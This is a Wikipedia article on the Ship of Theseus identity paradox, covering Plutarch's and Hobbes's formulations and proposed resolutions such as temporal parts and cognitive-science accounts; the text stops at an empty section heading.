There are developers here at The Atlantic who have lost a whole afternoon of work trying to debug an issue caused by 2.8.28. | @alexlamsl | What issue? 2.8.28 still functions correctly regardless of the bad timestamps produced by | It caused errors with the filesystem in our dockerized development environment. Of course it still functions as it's supposed to, provided the package can actually be installed. | The next 2.x release can be made with a non- | Same issue here. Our private deployment system reject the tarball. If I extract the tarball and | @alexlamsl please stop trying to defer blame here. The issue is with this specific npm package for a specific version. Push a new version so people can move on. | Should I post a | This is blocking my deployments also... Any workaround? | @mishagray use 2.8.27 until the module author decides that this isn't a problem with node / npm. | This seems related to npm/npm#10052, which (if resolved) would alleviate your issue. | It's true that npm/npm#10052 would incidentally fix this issue, because it would reset modification times on files, but there is a much simpler fix that would not require waiting for an 18-month-old issue on npm to be fixed. it is not a bug in npm.This is a bug in the package you pushed to the npm registry, @alexlamsl, plain and simple. Your refusal to acknowledge this or to take even the simplest steps to address it reflects very poorly on you and on this project. | @fdintino This is not a bug in UglifyJS. | Who cares what the cause of the issue is? Fix it first then point fingers after. This attitude of "not my problem" when your package is broken solves nothing. | I'm baffled by your attitude, frankly. An immeasurable amount of time has been put into this project by people in their own spare time, and you expect them to fix UglifyJS is not broken. (And to be honest, it is exactly this attitude that drives me away from doing OSS at all) | Fix MY Environment? Wtf are you talking about? 
It's been demonstrated that the tarball on npm has corrupted timestamp data. How is that MY environment? | Then the bafflement is mutual. You have four different people telling you that the file metadata in the 2.8.28 package is causing issues with their environments and deployments. And you have a (likely) easy solution—push a bumped version from a directory other than the corrupted one that published 2.8.28. But you ignore the former and don't seem to care about the latter. It goes without saying that everyone here appreciates the hard work that is poured into this project, otherwise we wouldn't be using it! I maintain several popular open source projects as well, and I appreciate the challenges that come with it. But if a package I published caused issues in multiple peoples environments, and it was in my power to fix it, I would do so! I think it's safe to assume that the odd modification time of the files in uglify-js is not intentional—it has no functional benefit and it's also plainly incorrect, these files were not modified in 1969. You have multiple people telling you that this causes incompatibilities in various different systems. I can only speak for myself, but here's a demonstration of how the files are incompatible in our system. To reproduce, you just need to install unison, a tool for performing two-way directory syncing: Outputs the following: Is it a bug that unison cannot sync files with a ctime and mtime of 0? Yes, perhaps, and I can open a ticket on that project. But judging by the others who have posted on this issue, the file metadata in the npm tgz are causing problems in other systems. And there is an easy way to ensure compatibility with everyone's system—a clean build and publish of a new version. I apologize for my tone earlier in this thread—I'm just frustrated by the refusal to even | @eric-tucker: "I cannot zip up the build folder because zip cannot handle files with a creation date before 1980." 
Even with the incorrect timestamps, The problem with your zip program is out of scope of uglify. It's trivial to write a command to touch the files for your broken | I will offer my apology regarding assuming this wasn't an npm issue and for any hostility shown previously. However, I stand by my affirmation that this should have been handled more professionally (by everyone), including keeping the issue open while people tracked down the root cause. Edit: side note - I wouldn't have been able to create any kind of helpful issue on npm as I have no idea what the author's build environment and/or npm/node versions were/are at the time of publish. The author should have created the ticket with npm saying "this is my environment and this is what happened." | My two cents here: It's important for maintainers of open-source projects to accept bugs as valid, This is also why issues should only be closed if there's clear evidence that they're invalid, not just "looks like not our problem". If there's doubt about whether it's user error or a bug in the maintainer's stack, then it's the job of the maintainer to ask the right questions to assess that (and prepare issue templates, and so on). The user can't know what information you need, until you ask. Put more succinctly: That having been said, there's a big difference between informing a maintainer that it's their job to handle bug reports, and personally accusing them of being responsible for your woes. Especially when you're a developer (read: a professional), you're expected to have the infrastructure in place to deal with upstream issues when they inevitably occur. While it is the maintainer's responsibility to pick up the bug and trace where it originates from, In the end, nothing is accomplished by pointing blame back and forth. 
Let's just each take our part of the responsibility - maintainers are responsible for tracking down bugs and getting them fixed regardless of where in the stack they occur, and developers ("users") are responsible for having their own contingency plans when things do eventually break, despite best efforts of all parties. | @joepie91 all excellent points. I would add though that, while I can only speak for myself, my expectation isn't that the uglifyjs maintainers should fix this | Very good points @joepie91 . I would agree with @fdintino that waiting until the next backport release to address this problem is definitely downplaying the severity of this issue. It's almost always brought in as a transitive dependency so for someone starting a new project who hasn't yet encountered this issue they are most certainly going to encounter this bug. This will continue to consume a lot of development hours across many companies until 2.8.29+ is released. I agree with using open source is always "at your risk" but this is an incredibly important issue that Closed means non-issue, can't reproduce, or some other status of "not something we can or will address." This issue falls under none of those categories. | Just to recap and to get a more clear vision of how we can proceed. The issue will not be fixed, although the problem is identified. At least until the next backport release? Is there any vague time frame when this happens? I am asking because we have no easy way to fix the current corrupted package by ourself in our current build chain. Any of the current workarounds flying around here are not really applicable in the way our build process works currently. So the only way to get our system running again is removing dependencies that pulled in UglifyJS2 and try to write the functionality ourself? I would be glad to get a statement about this so we can make an informed decision and work out a solution plan and start taking action to get our system back to life. 
| @pythoneer if you | When there's a complaint about a specific package version like this, please consider either using one of the many npm API tools to directly download the package and verify it, or using I understand that the root cause of this issue wasn't in uglify-js. But the tools you use when you build packages is still your responsibility. If you're using a tool (or a version of that tool) that produces incorrect output, the expectation is that you recall the release and/or you downgrade your tools until that issue is fixed - not that you leave everyone in limbo until upstream figures out what Many developers (myself included) like to use the latest versions of their tools and software, and that's understandable. But sometimes this can introduce bugs. I'd like to suggest that you set up a free account with https://travis-ci.org/. You can do automated builds on there and set it up to publish directly from there, so the setup on your local machine won't matter at that point. If your personal setup is going to change frequently, it makes sense to use a more static configuration that's not as fragile. Good luck in dealing with the remaining pieces of the issue. | Is it a matter of pride that the issue is still closed? I've already implemented fixes in our build processes and told the company wide to lock any new package.json entries to version 2.8.27. That doesn't mean that a new point release shouldn't be published immediately. Yes, it is a small inconvenience in terms of individual persons or projects, but you should consider the collective time spent across all people dealing with this issue, including the numerous other projects having reported issues that lead back to this issue (that leads back to the @alexlamsl please, at least reopen this issue, and mark it fixed when you have time to update node/npm and republish. This is going to continue to break builds until a fix is implemented. 
Put at least a little consideration into the time of all the people who will ultimately see this issue pop up. | @eric-tucker I'm glad that you were able to fix your build process, but I don't think it's a productive use of your time to continue repeating your opinions here. I'm pretty certain you've made your beliefs crystal clear. I think that everyone on both sides of this have had ample opportunity to express their opinions, and many valid points were made from both sides. At this point, the only logical thing to do is to sit back and see what the maintainers do. I do not believe that continuing to berate them will offer much incentive for them to grant your wishes. | If people had put as much effort into being helpful as into writing meme comments, this would have been fixed a week ago. I never actually had this problem, but the response of the maintainers and community is making me think that I am unsafe to depend on this tool. | mishoo/UglifyJS#2054 shrinkwrap was an issue because of cp-translations bumping on deploy npm 3 is dodgy on node 0.10 and would have forced an upgrade on all microservices so here is a dodgy workaround mishoo/UglifyJS#2054 shrinkwrap was an issue because of cp-translations bumping on deploy npm 3 is dodgy on node 0.10 and would have forced an upgrade on all microservices so here is a dodgy workaround Time to move to Clojure Compiler, this debacle is embarrassing. | @schwitzerm A fixed release was pushed out to npm, 2.8.29. I really appreciate it @alexlamsl. I don't benefit from it personally, but I'm glad this won't cause issues going forward for fellow developers. You have gotten a lot of grief (some, admittedly, from me). And you aren't likely to be thanked by any of the people who would have been frustrated by the node bug that crept into the 2.8.28 build but now will not, because people only notice when things break. 
The same goes for all of the other bug fixes you continue to push out for the 2.x backport branch and the features being added to 3.x. I would imagine, particularly after this episode, that this can sometimes be a thankless job. So I'd like to personally express my gratitude for your work. | @alexlamsl this is honestly the most brutal silent treatment from a maintainer of a popular repo I've seen till now. | With the amount of pisspoor attitude from most people in this thread, can you blame them? Also, this was never a problem caused by this project, it was always third party tools that couldn't handle timestamps properly, and the only reason it was found out was because of a bug in yet another tool. None of this was caused because of UglifyJS. However, they already So why are you still harping on this obsolete and outdated issue that doesn't mean anything to anyone anymore? | et304383 commented: This does not happen with 3.x.
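For context on the title: "Dec 31, 1969" is Unix epoch 0 rendered in a US timezone, and ZIP's DOS timestamp format cannot represent dates before 1980, which is why affected trees broke some tools. Several workarounds in the thread amount to touching the files; a minimal sketch of that idea (an illustration, not a command anyone in the thread actually posted):

```python
# Reset any pre-1980 modification times under a directory tree to "now",
# so tools with DOS-timestamp limits (like classic zip) can handle the
# files again. 315532800 is 1980-01-01 00:00:00 UTC in seconds since epoch.
import os
import time

def fix_ancient_mtimes(root, cutoff=315532800):
    """Touch every file whose mtime predates `cutoff`; return fixed paths."""
    fixed = []
    now = time.time()
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.getmtime(path) < cutoff:
                os.utime(path, (now, now))  # reset atime and mtime
                fixed.append(path)
    return fixed
```

This repairs an installed `node_modules` tree in place; it does not, of course, fix the corrupted tarball on the registry itself, which is what the thread was arguing about.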
true
true
true
[etucker: npm_test]$ ll total 0 [etucker: npm_test]$ npm install [email protected] npm WARN saveError ENOENT: no such file or directory, open '/home/etucker/play/npm_test/package.json' npm notice cr...
2024-10-12 00:00:00
2017-06-05 00:00:00
https://opengraph.githubassets.com/22b527f57acad6c65c66efe6419cceb33dab8c7b2fe27f25c87eba48566a4eea/mishoo/UglifyJS/issues/2054
object
github.com
GitHub
null
null
17,199,672
https://wamp-proto.org
The Web Application Messaging Protocol¶
null
# The Web Application Messaging Protocol

Welcome to the Web Application Messaging Protocol (WAMP)!

WAMP is an open application-level protocol that provides two messaging patterns:

- Routed **Remote Procedure Calls**
- **Publish & Subscribe**

It can use different serializers for message encoding (... and many others) and can run over different transports, like:

- Raw TCP socket
- Unix domain socket

The WAMP protocol is a community effort and the specification is made available for free under an open license for everyone to use or implement. The original design and proposal was created by Crossbar.io developers in 2012 and WAMP development has been sponsored since then by Crossbar.io (the company).

**Get in touch** with us on our mailing list, GitHub, or search for answers on StackOverflow. The WAMP protocol is also looking for contributors to help polish up the spec and fill in gaps. A good starting point is the list of open issues on our issue tracker.
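The two messaging patterns can be illustrated with a toy in-process router. This is a conceptual sketch only: real WAMP implementations speak a wire protocol over transports like those listed above, and the class and URIs below are invented for illustration:

```python
# Toy in-process "router" showing WAMP's two patterns: routed RPC
# (callers never address callees directly; the router forwards the call)
# and Publish & Subscribe (publishers and subscribers are decoupled by a
# topic URI). Not a WAMP implementation.

class ToyRouter:
    def __init__(self):
        self.procedures = {}   # URI -> callable   (RPC registrations)
        self.subscribers = {}  # URI -> [callback] (PubSub subscriptions)

    # --- Routed Remote Procedure Calls ---
    def register(self, uri, func):
        self.procedures[uri] = func

    def call(self, uri, *args):
        return self.procedures[uri](*args)  # router forwards the call

    # --- Publish & Subscribe ---
    def subscribe(self, uri, callback):
        self.subscribers.setdefault(uri, []).append(callback)

    def publish(self, uri, payload):
        for cb in self.subscribers.get(uri, []):
            cb(payload)

router = ToyRouter()
router.register("com.example.add", lambda a, b: a + b)
print(router.call("com.example.add", 2, 3))   # → 5

events = []
router.subscribe("com.example.topic", events.append)
router.publish("com.example.topic", "hello")
print(events)                                  # → ['hello']
```

The key design point both patterns share is indirection through URIs: neither the caller nor the publisher knows which peer, if any, is on the other side.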
true
true
true
null
2024-10-12 00:00:00
2024-01-01 00:00:00
null
null
wamp-proto.org
wamp-proto.org
null
null
21,050,811
https://www.seattletimes.com/business/technology/machine-learning-methods-harness-ai-to-help-wolverine-recovery/
Conservationists harness AI to help wolverine recovery in Washington
Melissa Hellmann
The elusive wolverine has a long history in its native Washington — the species survived the Ice Age but was nearly driven to extinction by over-hunting and trapping in the early 1900s. Recently, wolverines have made a comeback in the North Cascades: Conservationists estimate between three and four dozen of the bushy-tailed mammals currently populate the mountain range. Surprisingly, artificial intelligence (AI) technology could play a role in helping scientists further protect these deep snow dwellers vulnerable to climate change and habitat loss. Washington conservationists are focused on the recovery of the small carnivores. Using remote cameras that detect motion and a machine learning system, a method that finds patterns in a large amount of data, some researchers say they have the answer to tracking the shy creatures during a critical time for their survival. At the forefront of wolverine recovery in the state, Dr. Robert Long — senior conservation scientist of Seattle's Woodland Park Zoo — has placed remote cameras throughout Washington, Idaho, and Montana to track the animals for nearly a decade. The cameras allow conservationists to collect thousands of images that track the movements of wolverines and determine whether shifts in climate harm the populations. Such information could be used to create corridors for the wolverines, said Long, like the Interstate 90 animal overpass that enables safe passage over highways that cut through the North and South Cascades. "These top predators, or carnivores, can have major effects on the ecosystem. If they're gone, then their prey can increase in number," said Long. "We don't have a sense of the exact role these creatures play, so it would behoove us to ensure their populations persist," he added.
However, finding pictures of wolverines — among tens of thousands of images depicting various wildlife, people and swaying tree limbs that falsely triggered the motion sensors — proved to be time consuming for researchers. A lack of staff and volunteers to classify the photos led to an information lag, with biologists sometimes waiting months or years to use the data found in the images. Manoj Sarathy, a young gamer and a volunteer at the Seattle-based nonprofit Conservation Northwest, set out to eliminate the problem using his knowledge of AI. Sarathy developed a machine-learning system that could classify images from remote cameras by annotating thousands of images from several conservation organizations and feeding them back into a computer program. As he continued to improve the model’s training to recognize various objects, Sarathy sought to differentiate photos of animals from blank images, but he found that his gaming computer lacked the processing speed to train the system. So in 2018, Sarathy partnered up with Long to apply for a Microsoft AI for Earth grant, which provides cloud and AI tools to individuals and teams solving sustainability issues. As one of the over 300 AI for Earth grantees since Microsoft launched the program in 2017, Sarathy used $5,000 worth of cloud-computing credit that allowed him to train the system to sort all images into folders that corresponded with animals, humans or blank images. Long believes the machine-learning system will help conservationists gather information about the species before it’s too late. Ahead of the United Nations Climate Action Summit, Sarathy — now a freshman in the University of Washington computer-science program — is continuing his project and hopes to inspire others to protect the environment. “With me being an example, people can get involved with conservation using any skill they have without any kind of formal training,” Sarathy said. 
true
true
true
Using remote cameras that detect motion and a machine learning system, a method that finds patterns in a large amount of data, some researchers say they have the answer to tracking the shy creatures during a critical time for their...
2024-10-12 00:00:00
2019-09-22 00:00:00
https://images.seattleti…34.jpg?d=780x501
article
seattletimes.com
The Seattle Times
null
null
30,262,326
https://www.smartcompany.com.au/technology/innovation-intel-worlds-largest-chipmaker/
How a lack of innovation saw Intel dethroned as the world’s largest chipmaker
Howard Yu
American chip-making giant Intel is a shadow of its former self. Despite the global semiconductor shortage, which has boosted rival chipmakers, Intel is making less money than a year ago, with net income down 21% year over year to US$4.6 billion ($6.45 billion).

Unfortunately, this is an ongoing trend. Intel was the world’s largest chipmaker until 2021, when it was dethroned by Samsung. Though Samsung’s main business is memory chips, a different segment of the market to Intel’s microprocessors, it is a sign of Intel’s decline. We’ve been tracking global companies’ future-readiness at the International Institute for Management Development (IMD), and Intel now comes out 16th in the technology sector.

There are two fundamental issues, according to Matt Bryson, an analyst at Wedbush Securities: “[Intel] fell behind AMD in chip design and Taiwan Semiconductor (TSMC) in manufacturing.” During the most recent earnings call with analysts, CEO Pat Gelsinger had to concede that the technology in Intel’s data-centre processors hadn’t been improved in five years. In his words, it was “an embarrassing thing to say”. How did this happen to a company that for many years was well ahead of its competition, and what are the chances of a turnaround?

## Intel’s in-house model

Intel used to be the undisputed king of microprocessors. PCs were made by many companies, but these were effectively just brand names. The prowess of the machines depended on whether they had an “Intel inside”.

Here is how you compete as a chipset manufacturer: you etch more transistors on a slice of silicon wafer. To achieve this, Intel outspent its rivals on R&D and attracted the best scientists. But most importantly, it kept full control of both product design and manufacturing. Intel’s engineers — from research to design to manufacturing — have always worked as a close in-house team.
In contrast, fellow US rivals like Qualcomm, Nvidia and AMD have either shed their manufacturing capacity or never had it in the first place. They outsource to suppliers such as TSMC and other third-party foundries for the same reason that most of the stuff sold in Walmart is made in China: it’s cheaper.

**Share performances of leading chipmakers, 2019-22**

The challenge with outsourcing manufacturing is that your suppliers are probably not in the same building as you. Meetings won’t happen at the watercoolers or in the staff cafeteria. It takes scheduling and coordination. There’s bureaucracy. It’s hard to be on the same page. The problems this can cause are all too evident — for a long while, TSMC and Nvidia would blame each other for manufacturing issues, for instance.

For years, Intel’s one-team approach enabled it to pull further and further away from the competition, with processors that were the most powerful. Yet what happened next was the classic disruption.

## The great library of Taiwan

When mobile took off, the chipset didn’t require as much computing power as those in a laptop or PC, since the priority was energy-saving to extend battery life on a single charge. As Intel was in the business of selling top-quality chips for high margins, it left its rivals to supply chipsets for this new market. As a result, Intel got locked into selling ever more expensive and power-guzzling CPUs for PCs.

With Qualcomm and Apple increasing orders to TSMC to supply Androids and iPhones, the Taiwanese supplier had to master remote work many years before the rest of us. It built up a formidable intellectual property (IP) library online, containing not only its own IP but also that of other suppliers in the value chain. TSMC could now quickly tell its customers what was possible from a manufacturing perspective and encode such knowledge into design rules. Transparency was total.
Its customers could take what was available from the menu and stretch their product design to the limit. TSMC’s library has gradually become the industry’s largest. The best part is that workflow coordination is done online in a “virtual foundry” system that involves performance simulation, computer modelling and instant feedback. With a virtual workflow that improves month after month, year after year, TSMC has steadily neutralised Intel’s advantages.

## Risk and demand

TSMC doesn’t have to shoulder the risks of launching a new product. It just needs to excel in manufacturing, because if a Qualcomm product fails, AMD’s may take off. TSMC can switch capacity from one client to another. Risk is mitigated when demand is pooled.

For chip designers, outsourcing to TSMC has gradually meant they can afford to be fast-moving and bold in product design. If a new chip doesn’t sell, they can pull the plug without having to worry about the factory: that’s TSMC’s problem. That’s how Nvidia has evolved beyond deploying graphics processors only in the gaming sector; it’s now leading in designing chipsets for AI applications. And AMD, an underdog close to bankruptcy in 2014, now makes some of the most powerful processors.

Intel, meanwhile, still needs to ensure that every product wins with enough volume to feed its network of factories, each costing billions of dollars. This has made the company more and more conservative. And having stuck to supplying chips to PCs, servers and data centres, it is struggling to innovate. Tellingly, the company’s gross margin — total revenue minus the cost of production — has been sliding for nearly a decade.

The biggest danger for a technology company is that it’s not developing leading-edge products fast enough, backsliding into selling commodities. The big issue for Pat Gelsinger is, how can a company built on self-reliance transform its culture quickly? He is talking about building a foundry service to regain scale in manufacturing.
But the question is, how can Intel become a collaborative organisation not in a decade, but in a year? Andy Grove, the legendary late chair of Intel, got it right. He said: “Only the paranoid survive.”

*This article is republished from* The Conversation *under a Creative Commons license. Read the original article.*
true
true
true
American chip-making giant Intel is a shadow of its former self. How did this happen to a company that for many years was well ahead of its competition, and what are the chances of a turnaround?
2024-10-12 00:00:00
2022-02-08 00:00:00
https://www.smartcompany…pg?fit=733%2C353
article
smartcompany.com.au
SmartCompany
null
null
2,900,878
http://stackoverflow.com/questions/1049947/should-utf-16-be-considered-harmful
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
16,605,928
http://www.dailymail.co.uk/news/article-5511183/Prison-reformer-runs-nonprofit-accused-sexual-assault.html
Prison reformer who runs nonprofit is accused of sexual assault
Dailymail com
# Prison reformer who runs nonprofit that aims to give ex-cons a 'second chance' is accused of sexual assault, harassment and ripping off her investors

- **Catherine Hoke runs Defy Ventures which turns ex-cons into entrepreneurs**
- **But former employees say its leader ran an abusive work environment**
- **Hoke is accused of misleading benefactors, and possibly ripping off clients**

The founder of a nonprofit company which aims to give ex-cons a second chance in the business world is facing accusations that could see her own career ending in tatters. Catherine Hoke founded Defy Ventures, a charity that is dedicated to helping former prisoners make a new start and begin their own businesses. However, she now faces some disturbing allegations of her own, with a number of former employees saying she fostered an abusive work environment, misled benefactors, and may even have ripped off clients.

Several big names have donated grants to Defy, including Google, the Koch brothers and Facebook COO Sheryl Sandberg. But according to The Daily Beast, such names may now be regretting being associated with the charity after Defy fired its president, Roger Gordon, when he blew the whistle on allegations of sexual harassment by Hoke and fraudulent statistics exaggerating the program's successes.

Hoke describes Defy as 'a second chance for people with criminal histories by offering classes for current and formerly incarcerated people.' The program operates in 15 prisons and also teaches classes online. The firm is also something of a redemption for Hoke, after she made some transgressions of her own.
Hoke was running a business skills-training program for Texas prisoners in 2004, but five years later she was banned after she was discovered to have had sexual relations with four program graduates. She started anew by founding Defy in 2010, making a fresh start for herself in New York.

Three months ago, the company brought on Roger Gordon as its new president; he had chaired a nonprofit that employed more than 100 formerly incarcerated people. But just weeks into the job, Gordon began to have concerns about Hoke's conduct and suggested she may have made up numbers about the success of the program.

One complaint against Hoke was brought by a female former employee who said Hoke 'reached her hand up the employee's skirt twice at a company party.' 'The employee signed a nondisclosure agreement prohibiting her from disclosing the incident or the existence of the NDA to anyone except the CEO, her husband or the COO.' 'Two employees who witnessed the assault were forced to relinquish their personal mobile phones and passwords.'

On another occasion, a former Defy client, Kenneth Maxwell, sued Hoke in 2015 alleging he was forced out of the program over his 'refusal to consummate a personal and sexual relationship' with her. The lawsuit was later dismissed.

Another female employee told The Daily Beast Hoke sexually harassed her during a business trip in 2014, forcing her to share a bed. 'When we checked in to the Vertigo Hotel, the reserved room only had one king-size bed, which Catherine and I both occupied despite my repeated suggestions that I sleep on a cot,' the female former employee wrote.
The former Defy staffer allegedly quoted Hoke telling her she 'doesn't usually like blondes, but that I am really hot.' She also wrote that Hoke said she and her husband 'would try to 'gross each other out' by imagining a former employee masturbating, and that Hoke was sad she had to share a room on the trip 'because she wasn't able to bring her toys along.'

The allegations were all noted in a letter written by Gordon and seen by the Daily Beast. Gordon also alleges that the company pocketed money from prospective students who never made it onto the program. 'There have been allegations that Defy has collected application fees from students without intending to admit them and that winners of in-prison business plan competitions do not receive the cash prizes they are promised,' he wrote in his letter. 'Instead, they have been asked to reimburse Defy for program costs and to sign over the money.' It's believed Defy's fees are around $1,200 to take the largely online course.

Gordon said he also felt uncomfortable that Defy stated only 5 percent of the 5,500 students that have been through its courses re-offend. 'There is no way to arrive at this figure through any consistent and doctrinally sound methodology,' Gordon alleged in his letter to the board. 'Rather, it appears to be arrived at by selectively including program participants and by broadly defining success. More specifically, only the relatively few participants who complete the entire program are checked for recidivism and even then data is selectively omitted.'

Gordon also wrote how Defy attempts to court donors by taking them on prison visits. A well-polished routine exists whereby the company brings supporters along to meet incarcerated students.
Hoke then calls out the students using personal information, such as 'step to the line if your first arrest was before the age of 10.' The whole ploy appears to work well with investors. What Gordon felt uncomfortable with, however, was the fact that the same exercise would be repeated three different times for three different sets of donors in a carefully choreographed set, while still attempting to create the illusion of spontaneity.

Other employees told The Daily Beast that the figures misleadingly included people who had enrolled in classes but not necessarily taken classes. Gordon also alleged that many of the endeavors Defy claims to have helped launch never went much further than a student registering a business name with the state.

After taking his concerns to the board, he was suspended and told to hand over all the notes he had taken while on the job. Defy then fired Gordon, citing his outreach to donors and employees. Gordon was terminated for 'communicating with donors and supporters of the organization in a manner that the Board believed was damaging to Defy and inconsistent with Mr. Gordon's fiduciary obligations' against the board's orders, Defy said in a statement.

The firm also commented on Gordon's allegations: 'We feel compelled to say that Mr. Gordon's allegations do not appear to be supported by other members of the organization or by other evidence available to the investigators.'
true
true
true
The founder of a nonprofit company which aims to give ex-cons a second chance in the business world is facing accusations that could see her own career ending in tatters.
2024-10-12 00:00:00
2018-03-16 00:00:00
https://i.dailymail.co.u…521232770486.jpg
article
dailymail.co.uk
Daily Mail
null
null
15,581,462
https://www.apifort.com/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
9,387,399
http://aeon.co/magazine/psychology/why-dont-our-brains-explode-at-movie-cuts/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
34,423,516
https://www.epicurious.com/expert-advice/why-ice-cubes-are-popular-in-america-history-freezer-frozen-tv-dinners-article
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
13,781,807
http://mashable.com/2017/03/03/mcdonald-serves-dead-lizard-in-fries-pregnant-woman/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
28,293,915
https://igchicago.org/2021/08/24/oig-finds-that-shotspotter-alerts-rarely-lead-to-evidence-of-a-gun-related-crime-and-that-presence-of-the-technology-changes-police-behavior/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
3,205,097
http://www.randsinrepose.com/archives/2011/11/06/why.html
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
12,303,358
https://clocktweets.com/en/
Schedule your posts with love · Swello
Jonathan NOBLE
A simple & efficient solution to manage your social media accounts, always with love. Conduct your monitoring, schedule your content and analyze the impact of your posts on social networks from a single dashboard. 4.8/5 – 124 reviews on Trustpilot. We support more than 140K communicators, including 600 major groups, in their Social Media strategy.

**Manage all your social media accounts with Swello.** From LinkedIn to Instagram, including TikTok, Facebook, and X (ex-Twitter), Swello allows you to quickly communicate with your various communities. A very easy to use all-in-one solution:

- **Monitoring:** Every day, discover many articles to share and follow what is said about you on the internet and social networks.
- **Schedule your posts:** Save time by scheduling all your posts (LinkedIn, Instagram, TikTok, Facebook and X (ex-Twitter)) from Swello.
- **Manage your community:** Gather your incoming messages and comments in a single inbox (coming soon).
- **Analyze your results:** Measure the impact of your published posts and find out what your audience likes best.

But also, essential tools to help you save even more time and make your daily work easier:

- **Swello Pixel:** Adapt your visuals to the right format, add text, filters and save your templates in a few clicks!
- **Link shortener:** Reduce and customize all your URLs, while tracking their performance.
- **Quality coach:** With personalized advice, write messages tailored to your audience and schedule them at the best times.
- **Team management:** Work with your team and your clients simply. Assign them different roles (reader, writer, editor).
- **Shared library:** Store, access and re-use your content (text and media) directly from the platform!
- **Editorial calendar:** Get a complete view of all your publications, add your events and share them with your customers.
- **Mobile apps for iOS / Android:** Schedule and manage all your drafts and pending posts from your pocket.
- **Made in France:** Based a few meters from the sea (Toulon), the whole Swello team is there to put you in a good mood.

"The interface is simple, fun and very easy to learn. The Swello team is also easy to contact and very professional!" (Camille Deschamps, Communication Officer, MAIF)

"Swello allows us to manage our social accounts efficiently. A team that is always present and a platform that is always evolving." (Léa Bulteau, Community Manager, BDO France)

"Very easy to use and efficient solution. My team can't live without it, it's the perfect tool! I highly recommend!" (Léo Dubois, Communication Officer, Roissy-en-Brie)

"Easy to use, efficient and equipped with many features, Swello has revolutionized our organization and saved invaluable time!" (Isabelle Benoit, Community Manager, La Londe-les-Maures)

"Very practical tool, which adds new features that keep pace with the developments of social networks, coupled with an attentive team." (Sophie Renard, Communication Officer, Lyon Bar Association, Order of Lawyers)

Find the subscription fitting your needs; try Swello unlimited for 7 days, free of charge. Yearly billing saves two months. Every plan includes the scheduling, analysis and monitoring features:

- **Medium:** €9.90 per month (or €118.80 excl. VAT per year), 1 user, 5 social profiles.
- **Large:** €29.90 per month (or €358.80 excl. VAT per year), 5 users, 15 social profiles.
- **Business:** from €49.90 per month (or €598.80 excl. VAT per year), more than 5 users, more than 15 social profiles.
true
true
true
Schedule your posts with love. Save time and manage your social media strategy easily.
2024-10-12 00:00:00
2024-01-01 00:00:00
https://swello.com/bundl…mepage-og-en.jpg
website
swello.com
Swello.com
null
null
17,962,230
https://blog.wallaroolabs.com/2018/09/converting-a-batch-job-to-real-time/
null
null
null
false
false
false
null
null
null
null
null
null
null
null
null
39,660,669
https://en.wikipedia.org/wiki/Ship_of_Theseus
Ship of Theseus - Wikipedia
null
# Ship of Theseus

The **Ship of Theseus**, also known as **Theseus's Paradox**, is a paradox and a common thought experiment about whether an object is the same object after having all of its original components replaced over time, typically one after the other.

In Greek mythology, Theseus, the mythical king of the city of Athens, rescued the children of Athens from King Minos after slaying the minotaur and then escaped onto a ship going to Delos. Each year, the Athenians would commemorate this by taking the ship on a pilgrimage to Delos to honour Apollo. A question was raised by ancient philosophers: After several hundreds of years of maintenance, if each individual piece of the Ship of Theseus were replaced, one after the other, was it still the same ship?

In contemporary philosophy, this thought experiment has applications to the philosophical study of identity over time. It has inspired a variety of proposed solutions and concepts in contemporary philosophy of mind concerned with the persistence of personal identity.

## History

In its original formulation, the "Ship of Theseus" paradox concerns a debate over whether or not a ship that had all of its components replaced one by one would remain the same ship.[1] The account of the problem has been preserved by Plutarch in his *Life of Theseus*:[2]

The ship wherein Theseus and the youth of Athens returned from Crete had thirty oars, and was preserved by the Athenians down even to the time of Demetrius Phalereus, for they took away the old planks as they decayed, putting in new and strong timber in their places, insomuch that this ship became a standing example among the philosophers, for the logical question of things that grow; one side holding that the ship remained the same, and the other contending that it was not the same.
— Plutarch, *Life of Theseus* 23.1

Over a millennium later, the philosopher Thomas Hobbes extended the thought experiment by supposing that a ship custodian gathered up all of the decayed parts of the ship as they were disposed of and replaced by the Athenians, and used those decayed planks to build a second ship.[2] Hobbes then posed the question of which of the two resulting ships — the custodian's or the Athenians' — was the same ship as the "original" ship.[1]

For if that Ship of Theseus (concerning the Difference whereof, made by continual restoration, in taking out the old Planks, and putting in new, the sophisters of Athens were wont to dispute) were, after all the Planks were changed, the same Numerical Ship it was at the beginning; and if some Man had kept the Old Planks as they were taken out, and by putting them afterward together in the same order, had again made a Ship of them, this would, without doubt, had also been the same Numerical Ship with that which was at the beginnings and so there would have been two Ships Numerically the same, which is absurd... But we must consider by what name anything is called when we inquire concerning the Identity of it... so that a Ship, which signifies Matter so figured, will be the same, as long as the Matter remains the same; but if no part of the Matter is the same, then it is Numerically another Ship; and if part of the Matter remains, and part is changed, then the Ship will be partly the same, and partly not the same.

— Hobbes, "Of Identity and Difference"[3]

Hobbes considers the two resulting ships as illustrating two definitions of "Identity" or sameness that are being compared to the original ship:

- the ship that maintains the same "Form" as the original, that which persists through complete replacement of material; and
- the ship made of the same "Matter", that which stops being 100 per cent the same ship when the first part is replaced.
[3][4]

## Proposed resolutions

The Ship of Theseus paradox can be thought of as an example of a puzzle of material constitution — that is, a problem with determining the relationship between an object and the material of which it is made.[1]

### Constitution is not identity

According to the *Stanford Encyclopedia of Philosophy*, the most popular solution is to accept the conclusion that the material out of which the ship is made is not the same object as the ship, but that the two objects simply occupy the same space at the same time.[1]

### Temporal parts

Another common theory, put forth by David Lewis, is to divide up all objects into three-dimensional time-slices which are temporally distinct. This avoids the issue that the two different ships exist in the same space at one time and a different space at another time by considering the objects to be distinct from each other at *all* points in time.[1]

### Cognitive science

According to other scientists, the thought puzzle arises because of extreme externalism: the assumption that what is true in our minds also holds true in the world.[5] Noam Chomsky says that this is not an unassailable assumption, from the perspective of the natural sciences, because human intuition is often mistaken.[6] Cognitive science would treat this thought puzzle as the subject of an investigation of the human mind. Studying this human confusion can reveal much about the brain's operation, but little about the nature of the human-independent external world.[7] Following on from this observation, a significant strand in cognitive science would consider the ship not as a thing, nor even a collection of objectively existing thing parts, but rather as an organisational structure that has perceptual continuity.
[8]

### Deflationism

